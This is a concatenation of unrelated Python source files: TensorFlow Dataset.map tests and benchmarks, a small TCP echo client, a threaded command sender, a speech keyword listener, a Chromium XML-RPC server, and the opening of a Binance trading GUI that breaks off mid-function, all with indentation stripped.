def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (dataset_ops.Dataset.range(10)
.map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapOutOfRangeError(self):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
iterator = (
dataset_ops.Dataset.range(105)
.map(lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(100):
self.assertEqual(i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testConstantOutput(self):
iterator = (
dataset_ops.Dataset.range(10).map(lambda x: [x, "hello", 10])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, b"hello", 10), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testWarnOnLookupTable(self):
def collecting_function(x):
_ = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer([], []), 0.0, name="t1")
return x
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(collecting_function)
# NOTE(mrry): Python 3 prints other warnings in addition to the one we are
# testing, so we search for the expected warning.
self.assertGreaterEqual(len(w), 1)
found_warning = False
for warning in w:
if ("Creating lookup tables inside a function passed to Dataset.map() is "
"not supported." in str(warning)):
found_warning = True
break
self.assertTrue(found_warning)
def testNestedDatasetError(self):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
NotImplementedError, r"The Dataset.map\(\) transformation does not "
"currently support nested datasets as outputs."):
_ = dataset.map(dataset_ops.Dataset.from_tensor_slices)
def testReturnValueError(self):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
TypeError, r"Unsupported return value from function passed to "
r"Dataset.map\(\): None."):
_ = dataset.map(lambda x: None)
def testBrokenFunctionErrorOnInitialization(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])
def broken_function(_):
"""A function deliberately designed to fail on instantiation."""
value = []
tensor_value = attr_value_pb2.AttrValue()
tensor_value.tensor.CopyFrom(
tensor_util.make_tensor_proto(
value, dtype=dtypes.float32, shape=[0], verify_shape=False))
dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)
# Create a "Const" op with a `tf.float32` value and a `tf.int32` type
# attr.
const_tensor = ops.get_default_graph().create_op(
"Const", [], [dtypes.int32],
attrs={
"value": tensor_value,
"dtype": dtype_value
},
name="BrokenConst").outputs[0]
return const_tensor
dataset = dataset.map(broken_function)
iterator = dataset.make_initializable_iterator()
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.InvalidArgumentError, "BrokenConst"):
sess.run(iterator.initializer)
class MapDatasetBenchmark(test.Benchmark):
def benchmarkChainOfMaps(self):
chain_lengths = [0, 1, 2, 5, 10, 20, 50]
for chain_length in chain_lengths:
for use_inter_op_parallelism in [False, True]:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(0).repeat(None)
for _ in range(chain_length):
dataset = dataset_ops.MapDataset(
dataset,
lambda x: x,
use_inter_op_parallelism=use_inter_op_parallelism)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element.op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element.op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset chain length%s: %d Median wall time: %f" %
(" (single threaded mode)" if not use_inter_op_parallelism
else "", chain_length, median_wall_time))
self.report_benchmark(
iters=1000,
wall_time=median_wall_time,
name="benchmark_map_dataset_chain_latency_%d%s" %
(chain_length, "_single_threaded"
if not use_inter_op_parallelism else ""))
def benchmarkMapFanOut(self):
fan_outs = [1, 2, 5, 10, 20, 50, 100]
for fan_out in fan_outs:
for use_inter_op_parallelism in [False, True]:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(
tuple(0 for _ in range(fan_out))).repeat(None)
dataset = dataset_ops.MapDataset(
dataset,
lambda *xs: xs,
use_inter_op_parallelism=use_inter_op_parallelism)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element[0].op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element[0].op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset fan out%s: %d Median wall time: %f" %
(" (single threaded mode)" if not use_inter_op_parallelism
else "", fan_out, median_wall_time))
self.report_benchmark(
iters=1000,
wall_time=median_wall_time,
name="benchmark_map_dataset_fan_out_%d%s" %
(fan_out, "_single_threaded"
if not use_inter_op_parallelism else ""))
if __name__ == "__main__":
test.main()
|
client.py
|
import socket
import threading
import sys
import datetime
class Client:
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create a TCP socket over IPv4
port = 800
buffSize = 1024
def __init__(self, ip):
self.ip = ip
self.soc.connect((self.ip, self.port))
#sendTh = threading.Thread(target=self.sendMessage)
#sendTh.daemon = True
#sendTh.start()
while True:
data = self.soc.recv(self.buffSize)
#rcvTime = datetime.datetime.now()
if not data:
break
self.soc.send(bytes(data))
##print(datetime.datetime.strptime(data.decode('utf-8'), '%Y-%m-%d %H:%M:%S.%f'))
#print((rcvTime - datetime.datetime.strptime(data.decode('utf-8'), '%Y-%m-%d %H:%M:%S.%f')).total_seconds())
def sendMessage(self):
while True:
msg = input("")
# tes = datetime.datetime.now().time()
# print(tes)
#self.soc.send(bytes(input(""), 'utf-8'))
self.soc.send(bytes(str(datetime.datetime.now()), 'utf-8'))
#self.soc.send(bytes(str(datetime.datetime.now().time()) + " ;;" + input(""), 'utf-8'))
if(len(sys.argv) > 1):
client = Client(sys.argv[1])
else:
print("Please provide the IP of server!")
|
parallel_senders.py
|
import threading
import BB
class ParallelSender(object):
'''
Sends a command and waits for the answer in parallel to other threads' execution,
allowing other threads to poll whether the response has been received.
:param Command command: Command to be sent, must be an instance of class Command.
:param int timeout: (Default 300000) How much time (in milliseconds) to wait for a response before trying again or aborting.
:param int attempts: (Default 1) How many attempts to send the command if no response is received after timeout.
If attempts is 0, it will keep trying indefinitely until StopSending is called. (Use carefully)
.. note::
Notice the command is sent when the object is created.
'''
def __init__(self, command, timeout = 300000, attempts = 1):
self.__sendingLock = threading.Lock()
self.__sending = True
self.__respLock = threading.Lock()
self.__response = None
self.__command = command
self.__attemptsLock = threading.Lock()
self.__attempts = attempts
self.__timeout = timeout/1000.0
self.__p = threading.Thread(target=self.__Execute)
self.__p.daemon = True
self.__p.start()
@property
def sending(self):
'''
A property that indicates whether the object is still waiting for a response.
'''
self.__sendingLock.acquire()
r = self.__sending
self.__sendingLock.release()
return r
def __setSending(self, s):
self.__sendingLock.acquire()
self.__sending = s
self.__sendingLock.release()
@property
def response(self):
'''
A property for retrieving the response object generated by the command.
This property should be used when *sending* is ``False``.
'''
if not self.__respLock.acquire(False):
return None
r = self.__response
self.__respLock.release()
return r
def __setResponse(self, R):
self.__respLock.acquire()
self.__response = R
self.__respLock.release()
def StopSending(self):
self.__attemptsLock.acquire()
self.__attempts = 1
self.__attemptsLock.release()
def __Execute(self):
response = None
currentAttempt = 0
self.__attemptsLock.acquire()
att = self.__attempts
self.__attemptsLock.release()
while not response and (att == 0 or currentAttempt < att):
currentAttempt += 1
response = BB.SendAndWait(self.__command, self.__timeout)
self.__attemptsLock.acquire()
att = self.__attempts
self.__attemptsLock.release()
self.__setResponse(response)
self.__setSending(False)
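# Illustrative sketch (not part of the original module): the intended polling
# pattern for ParallelSender. The `command` argument is a hypothetical Command
# instance; the real command classes are defined elsewhere in the BB package.
def example_wait_for_response(command, timeout=5000, attempts=3):
    sender = ParallelSender(command, timeout=timeout, attempts=attempts)
    while sender.sending:
        pass  # other work could be done here instead of busy-waiting
    return sender.response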
|
audio_listener.py
|
#!/usr/bin/env python
import mpl_toolkits # import before pathlib
import sys
import os
import pathlib
import time
import shutil
from functools import partial
from multiprocessing.dummy import Pool
import threading
from io import BytesIO
import traceback
from timeit import default_timer as timer
from typing import Union
from collections import Counter
import numpy as np
from speech_recognition import Microphone
from speech_recognition import Recognizer
from speech_recognition import AudioData
# sys.path.append(pathlib.Path(__file__).parent)
from dataset import *
import command
import noisered
SAMPLE_RATE = 16000
PHRASE_TIME_LIMIT = 2
# MODEL_WEIGHT_PATH = 'model/kmn_cnn2_lfbe.weights.best.hdf5'
MODEL_WEIGHT_PATH = 'model/kmn_cnnbidirect_lfbe.weights.best.hdf5'
THREAD_NUM = 1
# SHARED_MEM_DIR = f"/dev/shm/keyword_recognizer_{''.join(random.choices(string.ascii_uppercase + string.digits, k=10))}"
SHARED_MEM_DIR = "/var/tmp/keyword_recognizer"
INPUT_WAV = 'input.wav'
NOISERED_WAV = 'noisered.wav'
BG_WAV = 'bg_input.wav'
INPUT_WAV_PATH = os.path.join(SHARED_MEM_DIR, INPUT_WAV)
NOISERED_WAV_PATH = os.path.join(SHARED_MEM_DIR, NOISERED_WAV)
BG_WAV_PATH = os.path.join(SHARED_MEM_DIR, BG_WAV)
class ModelMap(object):
def __init__(self):
self.models = {}
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def initialize_shared_mem_dir(dir_name=SHARED_MEM_DIR):
if os.path.exists(dir_name):
eprint('temp dir already exists in shared mem.')
sys.exit(1)
else:
os.makedirs(dir_name)
def remove_shared_mem_dir(dir_name=SHARED_MEM_DIR):
try:
shutil.rmtree(dir_name)
except OSError as e:
eprint("Error: %s - %s." % (e.filename, e.strerror))
def load_model():
# import single_word_model
# model = single_word_model.create_model_cnn2(input_shape=(Tx, n_freq), is_train=False)
import multi_words_model
model = multi_words_model.create_model_cnn_bidirect(input_shape=(Tx, n_freq), is_train=False)
model.load_weights(MODEL_WEIGHT_PATH)
model.summary()
return model
def summarize_prediction(predicted):
# decoded = np.argmax(predicted)
decoded = Counter([np.argmax(p) for p in predicted])
print(decoded)
def predict_word(audio_data: AudioData, model_map: ModelMap):
try:
if not os.path.exists(BG_WAV_PATH):
print("bg audio is not ready.")
return
try:
os.remove(INPUT_WAV_PATH)
except OSError:
pass
# execute noise reduction
with open(INPUT_WAV_PATH + '.tmp', 'wb') as f:
f.write(audio_data.get_wav_data())
with noisered.SEMAPHORE:
try:
os.remove(INPUT_WAV_PATH)
except OSError:
pass
os.rename(INPUT_WAV_PATH + '.tmp', INPUT_WAV_PATH)
if not noisered.create_noisered_wav(INPUT_WAV_PATH, NOISERED_WAV_PATH, BG_WAV_PATH):
return
# load or get model
if threading.get_ident() not in model_map.models:
print(f"load model. tid:{threading.get_ident()}")
model_map.models[threading.get_ident()] = load_model()
model = model_map.models[threading.get_ident()]
# create input from wav data
# io_obj = BytesIO(audio_data.get_wav_data())
# x = create_mfcc_from_io(io_obj)
x = create_features(NOISERED_WAV_PATH, FEATURE_TYPE)
# x = create_mfcc_from_file(INPUT_WAV_PATH)
# complement shortage space
print(f"x:{x.shape},{x.dtype} framedata:{len(audio_data.frame_data)}")
if x.shape[0] < Tx:
# min_val = np.amin(x, axis=0)
# print(f"min_val:{min_val.shape}")
# calc remaining space size
empty_space_size = Tx - x.shape[0]
# create remaining space
# empty_space = np.tile(min_val, (empty_space_size, 1))
empty_space = np.zeros((empty_space_size, n_freq), dtype=np.float32)
# complement data's empty space
print(f"emptysp:{empty_space.shape}")
x = np.concatenate((x, empty_space), axis=0)
# frames = np.array(data)
if x.shape[0] > Tx:
eprint(f"trim input. from={x.shape[0]} to={Tx}")
x = x[:Tx]
x = np.float32(np.array([x]))
print(f"x:{x.shape},{x.dtype}")
# do predict
start = timer()
predicted = model.predict(x)
end = timer()
print(f"predicted:{predicted} time:{end - start}")
summarize_prediction(predicted[0])
except:
traceback.print_exc()
raise
def callback(_: Recognizer, audio_data: AudioData, model_map: ModelMap, pool: Pool):
pool.apply_async(predict_word, (audio_data, model_map,))
def extract_silence(raw_data: bytearray, percentile=75) -> Union[AudioSegment, None]:
# generate the WAV file contents
wav_io = BytesIO(raw_data)
segment = AudioSegment.from_wav(wav_io)
dbfs_list = [segment[i:i + 1].dBFS for i in range(len(segment))]
smoothed_dbfs_list = np.convolve(dbfs_list, np.array([1.0/10.0 for _ in range(10)])[::-1], 'same')
std = np.std(smoothed_dbfs_list)
if std < 3.5:
# treat as silence whole time.
print("background listener: treat as silence whole range")
return segment
threshold = np.percentile(dbfs_list, percentile)
step_size = 500
extract_size = 3000
print(f"background listener: segment_size:{len(segment)} std:{np.std(smoothed_dbfs_list)} threshold:{threshold}")
for i in np.arange(0, len(segment), step_size):
if i + extract_size >= len(segment):
# silent part is not found
return None
# print(f"threadhold:{threshold} vals:{smoothed_dbfs_list[i:i+extract_size][:30]}")
if all([v < threshold for v in smoothed_dbfs_list[i:i+extract_size]]):
return segment[i:i+extract_size]
else:
# silent part is not found
return None
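# Illustrative sketch (added; not in the original script): run extract_silence over raw
# WAV bytes read from disk. 'example.wav' is a placeholder path, and AudioSegment is
# assumed to come from the `dataset` wildcard import above.
# with open('example.wav', 'rb') as f:
#     silent_part = extract_silence(f.read(), percentile=75)
# if silent_part is not None:
#     silent_part.export('bg_example.wav', format='wav')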
def listen_background():
background_listener = noisered.BackgroundListener()
with Microphone(sample_rate=SAMPLE_RATE) as source:
background_listener.adjust_for_ambient_noise(source)
while os.path.exists(SHARED_MEM_DIR):
audio_data = background_listener.listen(source, pause_time_limit=5)
if not audio_data:
print("background listener: no audio data")
time.sleep(1)
continue
segment = extract_silence(audio_data.get_wav_data())
if not segment:
print("background listener: no silence")
time.sleep(1)
continue
segment.export(BG_WAV_PATH + '.tmp', format='wav', bitrate=256)
with noisered.SEMAPHORE:
try:
os.remove(BG_WAV_PATH)
except OSError:
pass
# create wav file
os.rename(BG_WAV_PATH + '.tmp', BG_WAV_PATH)
print(f"export bgm. {BG_WAV_PATH}. size={len(segment)}")
# with open(BG_WAV_PATH, 'wb') as f:
# f.write(audio_data.get_wav_data())
def start_listen_background():
t = threading.Thread(target=listen_background, name='listen_background')
t.start()
def main():
# start to listen background with another thread.
start_listen_background()
while not os.path.exists(BG_WAV_PATH):
print('ready for bg wav ...')
time.sleep(1)
# initialize recognizer
recognizer = Recognizer()
recognizer.speaking_duration = 0.1
recognizer.phrase_threshold = 0.1
with Microphone(sample_rate=SAMPLE_RATE) as source:
# listen for 1 second to calibrate the energy threshold for ambient noise levels
recognizer.adjust_for_ambient_noise(source)
print("Calibrated. Say something!")
source = Microphone(sample_rate=SAMPLE_RATE)
with Pool(THREAD_NUM) as pool:
callback_with_model = partial(callback, model_map=ModelMap(), pool=pool)
recognizer.listen_in_background(source, callback_with_model, PHRASE_TIME_LIMIT)
while True:
time.sleep(10)
# pool.terminate()
if __name__ == '__main__':
try:
# initialize_shared_mem_dir()
main()
finally:
pass
# remove_shared_mem_dir()
|
rpc_server.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The task RPC server code.
This server is an XML-RPC server which serves code from
rpc_methods.RPCMethods.
This server will run until shutdown is called on the server object. This can
be achieved in 2 ways:
- Calling the Quit RPC method defined in RPCMethods
- Not receiving any calls within the idle_timeout_secs time.
"""
import logging
import threading
import time
import xmlrpclib
import SimpleXMLRPCServer
import SocketServer
#pylint: disable=relative-import
import common_lib
import rpc_methods
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
"""Restricts access to only specified IP address.
This call assumes the server is RPCServer.
"""
def do_POST(self):
"""Verifies the task is authorized to perform RPCs."""
if self.client_address[0] != self.server.authorized_address:
logging.error('Received unauthorized RPC request from %s',
self.client_address[0])
self.send_response(403)
response = 'Forbidden'
self.send_header('Content-type', 'text/plain')
self.send_header('Content-length', str(len(response)))
self.end_headers()
self.wfile.write(response)
else:
return SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.do_POST(self)
class RPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer,
SocketServer.ThreadingMixIn):
"""Restricts all endpoints to only specified IP addresses."""
def __init__(self, authorized_address,
idle_timeout_secs=common_lib.DEFAULT_TIMEOUT_SECS):
SimpleXMLRPCServer.SimpleXMLRPCServer.__init__(
self, (common_lib.SERVER_ADDRESS, common_lib.SERVER_PORT),
allow_none=True, logRequests=False,
requestHandler=RequestHandler)
self.authorized_address = authorized_address
self.idle_timeout_secs = idle_timeout_secs
self.register_instance(rpc_methods.RPCMethods(self))
self._shutdown_requested_event = threading.Event()
self._rpc_received_event = threading.Event()
self._idle_thread = threading.Thread(target=self._CheckForIdleQuit)
def shutdown(self):
"""Shutdown the server.
This overloaded method sets the _shutdown_requested_event to allow the
idle timeout thread to quit.
"""
self._shutdown_requested_event.set()
SimpleXMLRPCServer.SimpleXMLRPCServer.shutdown(self)
logging.info('Server shutdown complete')
def serve_forever(self, poll_interval=0.5):
"""Serve forever.
This overloaded method starts the idle timeout thread before calling
serve_forever. This ensures the idle timer thread doesn't get started
without the server running.
Args:
poll_interval: The interval to poll for shutdown.
"""
logging.info('RPC server starting')
self._idle_thread.start()
SimpleXMLRPCServer.SimpleXMLRPCServer.serve_forever(self, poll_interval)
def _dispatch(self, method, params):
"""Dispatch the call to the correct method with the provided params.
This overloaded method adds logging to help trace connection and
call problems.
Args:
method: The method name to call.
params: A tuple of parameters to pass.
Returns:
The result of the parent class' _dispatch method.
"""
logging.debug('Calling %s%s', method, params)
self._rpc_received_event.set()
return SimpleXMLRPCServer.SimpleXMLRPCServer._dispatch(self, method, params)
def _CheckForIdleQuit(self):
"""Check for, and exit, if the server is idle for too long.
This method must be run in a separate thread to avoid a deadlock when
calling server.shutdown.
"""
timeout = time.time() + self.idle_timeout_secs
while time.time() < timeout:
if self._shutdown_requested_event.is_set():
# An external source called shutdown()
return
elif self._rpc_received_event.is_set():
logging.debug('Resetting the idle timeout')
timeout = time.time() + self.idle_timeout_secs
self._rpc_received_event.clear()
time.sleep(1)
# We timed out, kill the server
logging.warning('Shutting down the server due to the idle timeout')
self.shutdown()
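# Illustrative helper (added; not part of the original Chromium file). It sketches how a
# client on the authorized host could request shutdown via the Quit RPC mentioned in the
# module docstring, reusing the xmlrpclib and common_lib modules already imported above.
# 'localhost' is an assumption; use the actual server address in practice.
def _example_quit_client():
    """Ask a locally running RPCServer to shut down via the Quit RPC method."""
    proxy = xmlrpclib.ServerProxy(
        'http://localhost:%d' % common_lib.SERVER_PORT, allow_none=True)
    proxy.Quit()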
|
iTrader.py
|
from tkinter import *
from tkinter import Menu
from tkinter import ttk
from tkinter.ttk import Combobox
from tkinter import messagebox
import tkinter.font as font
from binance_api import Binance
import threading
import time
import datetime
import os
import os.path
#Main global variables
ep = False
#Pressed Button states - daemon process flags
PS1 = False #Timer button_1 state (Start/Stop) true/false
PS_BU = False #Timer button_2 state (Start/Stop) true/false
PS_AB = False #Timer button_AB state (Start/Stop) true/false
PS_OT = False #Timer button_OrdTmr state (Start/Stop) true/false
Ord_Zm = False #Whether to show the order Zoom chart - button_Ord state (Zoom/Norm) true/false
#Timer run states - daemon process flags
should_run_T = False #Timer TICK start true/false
should_run_C = False #Timer CANDLES start true/false
should_run_S = False #Timer CANDLES SUMM start true/false
should_run_BU = False #Timer BTC/USDT watch start true/false
should_run_AB = False #Timer Account Balances watch start true/false
should_run_OT = False #Timer Order Timer start true/false
should_run_OZ = False #Timer Order Zoom start true/false
#Program shutdown variables - whether all timers have stopped
TE_Tck = True
TE_Cnd = True
TE_CndSm = True
TE_BU = True
TE_AB = True
TE_Zm = True
TE_OrdTmr = True
#API Keys from Binance
API_KEY_s = ''
API_SECRET_s = ''
bot = Binance(API_KEY='', API_SECRET='')
isAcc = False
sys_msg = ''
yI=0
y0I_TP=0
yM=0
Lo=0
TT0=0
#Pair parameters for the charts
GS='CANDLE 5m'
grSmb = 'BNBUSDT' #Chart symbol
Lo=0 #Last order id
grSt = 16 #Price step on the chart
grZm = 500 #Zoom parameter
grOW = 1000 #Parameter for the order candle width
prSt = 0.1 #Price step
grH = 1 #Chart height
grW = 1 #Chart width
grMd = 0.5 #Half of the chart height
NwOrSw=False
#Market parameters
MS = 'SPOT' #FUTURES or SPOT
MPS = 'USDT'
#Individual pair parameters
Lvrg = 1
Lvrg_Tmp = 1
MrgT='NONE'
MrgT_Tmp='NONE'
Isl = True
orLSS=1
#Position parameters (futures)
PEP = 0
PSP = 0
PPP = 0
PPP_Tmp = 0
PSP_Tmp = 0
PosSide='LONG'
#Main global variables
#Order variables
yI0Zm = 0 #Current price for OrderZoom
#______________Tick chart timer
class Timer_Tick:
def __init__(self):
global yI
global Lo
global TE_Tck
while True:
if PS1 == True:
sys_msg = ' Тиковый график ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = True
break
if should_run_T:
for i in range(400):
if not should_run_T:
sys_msg = ' Тиковый график ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_T:
if i==0:
sys_msg = ' Тиковый график ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = False
if i > 0:
time.sleep(0.01)
#Link to view in a browser: https://api.binance.com/api/v1/depth?symbol=ETHBTC
#limit - number of records returned, from 5 to 1000 (default 100).
#Allowed values: 5, 10, 20, 50, 100, 500, 1000.
#0 can also be passed, but it may return a large amount of data.
#The request weight depends on the limit parameter. For a limit from 5 to 100 the weight is 1.
#For a limit of 500 the weight is 5. For a limit of 1000 the weight is 10.
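#Illustrative response shape (for reference; only the fields used below): {'lastUpdateId': ..., 'bids': [['price', 'qty'], ...], 'asks': [['price', 'qty'], ...]}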
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#If one participant bought and another sold, is that a buy or a sell?
#Answer: in the binance trade history, trades with isBuyerMaker == false are highlighted green,
#and those with true - magenta
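#Illustrative trade record shape (only the fields used below): {'id': ..., 'price': '...', 'quoteQty': '...', 'time': ..., 'isBuyerMaker': True/False}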
#sss41 = "BNBUSDT - trades"
if MS=='SPOT':
myTup12 =('trades', bot.trades(symbol=grSmb, limit=20)) #Tupl
myDicGr1 = myTup12[1][19] #dict
elif MS=='FUTURES':
myTup12 = ('FutTrades', bot.futuresTrades(symbol=grSmb, limit=20)) #tupl
myDicGr1 = myTup12[1][19] #dict
#print(myTup12[1][0])
#print(myTup12[1][19])
if i==0:
yI0=float(myDicGr1['price'])
yI=100
app.graph_1.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
#print (TT0)
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(500,grMd)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.3f" % (yI0))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.4f" % (yI0))
elif prSt < 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.8f" % (yI0))
yp=-60
ypi=-4
while yp < 1500:
points=[]
yp = 0 + ypi*60
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+ypi*15
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%M:%S")
app.graph_Tb.create_text(0 + ypi*60,10,text=tmm)
app.graph_Td.create_text(0 + ypi*60,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
